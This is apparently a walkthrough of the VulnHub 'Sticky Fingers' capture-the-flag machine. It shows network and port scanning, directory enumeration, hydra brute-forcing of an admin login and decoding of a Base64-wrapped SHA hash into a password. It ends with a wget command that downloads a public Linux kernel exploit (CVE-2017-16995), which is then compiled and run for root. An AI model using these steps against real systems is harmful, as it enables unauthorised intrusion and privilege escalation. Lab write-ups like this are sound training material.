Link — https://www.vulnhub.com/entry/bizarre-adventure-sticky-fingers,560/
Configuring Network Settings: To change the network settings of the “Vulnerable Web App” VM to use a bridged connection, follow these steps:
- In VirtualBox, select the “Stickyfingers” VM from the list of VMs.
- Click on the “Settings” button in the toolbar or right-click on the VM and select “Settings.”
- In the “Settings” window, select the “Network” tab.
- Under the “Attached to” drop-down menu, choose “Bridged Adapter.”
- From the “Name” drop-down menu, select the network interface that you want to bridge the VM to. This should be the network interface connected to your physical network.
- Click “OK” to save the changes.
First, we run a network discovery scan using this command:
sudo netdiscover -P -i eth0 -r 192.168.1.0/24

We got the IP address of the machine we have to pentest. With this IP we can run an Nmap scan.
To scan the IP's ports with service details, run this command:
sudo nmap -A -sS -sV 192.168.1.38

The scan shows us three open ports: SSH on port 22, domain on port 53, and HTTP on port 80.
Beginning with HTTP, browse to the IP in a web browser. When we get browser access to any target IP,

one thing that comes to mind is searching for hidden directories on it. For that we can use the “Dirb” web scanner tool with this command:
dirb http://192.168.1.38/

Let's enumerate each directory that was found and look for clues to the FLAG.

Credentials are needed. Moving on, check the other directories; maybe we can find something to get into the admin account.
The directory http://192.168.1.38/images/ contains a file named Flag.txt.txt.

Rendering the webpage and inspecting it, I got two names, ‘Zipperman’ and ‘Bucciarati’. Write them to a file for future use. We have two names, which may be the usernames for the admin login. Use hydra to search for public passwords for the admin page.

I did the scan shown above somewhat fast; it may take 2–3 hours to find the credentials. Now that we have a username and password, let's log in to the admin page and see what it contains.

It looks weird, but it contains a long string. What should we do with that?
ODBlNDEzMDQwNzFjYmY1ODU2NTM2ZTM5MGYzYzc3ZjQ0NWE0OGVjMDE3NzQwNzdiOGM2ODNlMzA5YzUzMTMyOQ==
Use CyberChef to bake it and see what it actually means.

The Magic tool shows the string is Base64-encoded. Let's analyse the decoded value with the Analyse hash tool.
Based on the analysis, the decoded string is a SHA hash. A hash cannot be decoded, so use any available online lookup tool to find the value it was computed from.

Password : 1Password1*
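The decoding step above, reproduced offline as an added example (not part of the original write-up): it strips the Base64 layer from the page's string, infers the likely hash family from the digest length, and shows that a digest is only ever matched by hashing guesses, which is why Base64 over an unsalted fast hash gives a stored password no protection. The function names and the demo guess list are constructed for illustration.

```python
import base64
import hashlib
import string

# String copied from the admin page in the write-up.
ENCODED = ("ODBlNDEzMDQwNzFjYmY1ODU2NTM2ZTM5MGYzYzc3ZjQ0NWE0OGVjMDE3"
           "NzQwNzdiOGM2ODNlMzA5YzUzMTMyOQ==")

# Hex-character lengths of common digests. Length only suggests a family;
# other algorithms share these sizes.
DIGEST_HEX_LENGTHS = {32: ["md5"], 40: ["sha1"], 56: ["sha224"],
                      64: ["sha256"], 96: ["sha384"], 128: ["sha512"]}


def peel_base64(text):
    """Strictly decode Base64 and return the ASCII payload, or None."""
    try:
        return base64.b64decode(text, validate=True).decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def candidate_algorithms(payload):
    """Guess hash algorithms from the length of a hex-only payload."""
    if not payload or any(c not in string.hexdigits for c in payload):
        return []
    return DIGEST_HEX_LENGTHS.get(len(payload), [])


def find_preimage(digest_hex, algorithm, guesses):
    """Hash each guess and compare: a digest is matched, never decoded."""
    target = digest_hex.lower()
    for guess in guesses:
        if hashlib.new(algorithm, guess.encode()).hexdigest() == target:
            return guess
    return None


if __name__ == "__main__":
    digest = peel_base64(ENCODED)
    print("decoded payload :", digest)
    print("likely algorithm:", candidate_algorithms(digest))
    # Constructed demo: hash a made-up value, then find it in a tiny list.
    demo = hashlib.sha256(b"constructed-secret").hexdigest()
    print("demo match      :",
          find_preimage(demo, "sha256", ["guess1", "constructed-secret"]))
```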
We have a new credential. Try to SSH in as the remaining username, ‘Bucciarati’, with the new password.

Type the username in lowercase letters.
The 4.1.0-19-generic version is a bit old, so it may have a vulnerability. Do a web search on the version and check whether you find something useful (information gathering phase).
CVE-2017-16995 shows a vulnerability in the same version we are looking at.

Steps:
wget "https://www.exploit-db.com/raw/45010" -O final.c
gcc -s final.c -o final2
./final2

FLAG{JoJ0sZ_B1Z4RrR3_AddV3nT9R3_}